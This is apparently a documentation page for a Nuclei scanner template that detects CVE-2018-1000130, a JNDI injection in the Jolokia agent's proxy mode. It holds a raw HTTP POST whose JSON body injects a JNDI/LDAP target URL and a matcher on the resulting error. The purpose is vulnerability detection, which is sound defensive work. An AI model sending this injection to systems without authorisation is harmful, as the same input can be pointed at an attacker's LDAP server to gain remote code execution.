Skip to content
Nuclei Templates

Jolokia Agent - JNDI Code Injection

ID: CVE-2018-1000130

Severity: high

Author: milo2012

Tags: cve2018,cve,jolokia,rce,jndi,proxy

Description

Section titled “Description”

Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.

YAML Source

Section titled “YAML Source”
id: CVE-2018-1000130


info:
  name: Jolokia Agent - JNDI Code Injection
  author: milo2012
  severity: high
  description: |
    Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://access.redhat.com/errata/RHSA-2018:2669
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/SexyBeast233/SecBooks
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-1000130
    cwe-id: CWE-74
    epss-score: 0.89191
    epss-percentile: 0.9873
    cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jolokia
    product: webarchive_agent
  tags: cve2018,cve,jolokia,rce,jndi,proxy


http:
  - raw:
      - |
        POST /jolokia/read/getDiagnosticOptions HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
        Content-Type: application/x-www-form-urlencoded


        {
           "type":"read",
           "mbean":"java.lang:type=Memory",
           "target":{
              "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
           }
        }


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"


      - type: status
        status:
          - 200
# digest: 4b0a0048304602210099d49f654123fd754b439bae4534294302584b5533d6c5c47501864457434f39022100847e0ae37909800598ad38da2bdd736a1e028579db3f4ed8fbc44584e9745f6a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-1000130.yaml"

View on Github